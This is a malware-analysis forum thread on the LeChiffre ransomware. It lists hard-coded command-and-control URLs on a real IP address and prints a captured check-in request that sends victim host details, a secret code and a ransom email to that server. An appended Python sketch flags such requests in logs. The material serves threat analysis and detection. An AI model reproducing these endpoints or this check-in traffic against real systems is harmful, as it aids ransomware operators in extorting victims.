Ransom.LeChiffre

Forum for analysis and discussion about malware.

Post by Xylitol » Mon Jan 25, 2016 12:47 pm

Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Ransom.LeChiffre

Post by p1nk » Mon Jan 25, 2016 3:45 pm

I'm seeing a bunch of hard-coded control server paths:

hxtp://184.107.251.146/sipvoice.php?cha ... =&comment=
hxtp://184.107.251.146/sipvoice.php?insert=&servername=
hxtp://184.107.251.146/sipvoice.php?shutdown=&reason=
hxtp://184.107.251.146/sipvoice.php?update=&finished=
hxtp://184.107.251.146/sipvoice.php?updqua=&quantity=

Network:

GET /sipvoice.php?insert=&servername=Sandbox&username=Administrator&started=25.01.16 10:41&secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom&email=decrypt.my.files@gmail.com&session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE&patched=0 HTTP/1.0
Host: 184.107.251.146
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)


/sipvoice.php?
insert=
servername=Sandbox
username=Administrator
started=25.01.16 10:41
secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom
email=decrypt.my.files@gmail.com
session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE
patched=0



--------------------------

Also looks like the following was pwned:
ftp://200.27.90.24/_help%20to%20decrypt%20LeChiffre%20for%20[RESPALDO]%20l.html
Last edited by Xylitol on Mon Jan 25, 2016 3:56 pm, edited 1 time in total.
Reason: links obfuscation
p1nk
 
Posts: 39
Joined: Thu Oct 29, 2015 1:09 am
Reputation point: 2
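
Added example, not part of p1nk's post or of the thread: a Python sketch for flagging the check-in requests shown above in proxy or web-server logs. It uses only the /sipvoice.php path, the parameter names and the Synapse User-Agent from the post; the sample lines and their values are constructed, and treating an action/companion pair as a match whenever both keys are present is an assumption.

```python
import re

# Action flag -> companion parameter, from the URL templates in the post
# (the truncated "cha ..." template is left out).
ACTIONS = {"insert": "servername", "shutdown": "reason",
           "update": "finished", "updqua": "quantity"}
# Extra fields seen in the captured "insert" check-in.
CHECKIN_FIELDS = ("username", "started", "secretcode", "email", "session", "patched")
SYNAPSE_UA = "Mozilla/4.0 (compatible; Synapse)"
# The captured request carries a raw space inside "started", so the URI cannot
# be taken by splitting the request line on whitespace.
REQUEST_LINE = re.compile(r"^(GET|POST) (.+) HTTP/\d\.\d$")

def parse_query(query):
    """Split by hand: parse_qs would drop empty flags and turn '+' into a space."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key] = value
    return params

def classify(request_line, user_agent=""):
    """Return a dict describing a matching request, or None if it does not match."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return None
    path, _, query = m.group(2).partition("?")
    if not path.endswith("/sipvoice.php"):
        return None
    params = parse_query(query)
    for action, companion in ACTIONS.items():
        if action in params and companion in params:  # assumption: both keys present
            seen = [f for f in CHECKIN_FIELDS if f in params]
            return {"action": action, "host_field": params[companion],
                    "checkin_fields": seen, "ua_match": user_agent == SYNAPSE_UA}
    return None

# Constructed sample lines (placeholder values, not taken from a capture).
SAMPLES = [
    ("GET /sipvoice.php?insert=&servername=HOST1&username=user1&started=01.01.16 09:00"
     "&secretcode=AAAA+BBBB/CCCC==&email=placeholder@example.com&session=SESSIONID"
     "&patched=0 HTTP/1.0", SYNAPSE_UA),
    ("GET /sipvoice.php?updqua=&quantity=120 HTTP/1.0", SYNAPSE_UA),
    ("GET /index.php?insert=&servername=HOST1 HTTP/1.1", "curl/8.0"),
]

if __name__ == "__main__":
    for line, ua in SAMPLES:
        print(classify(line, ua))
```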

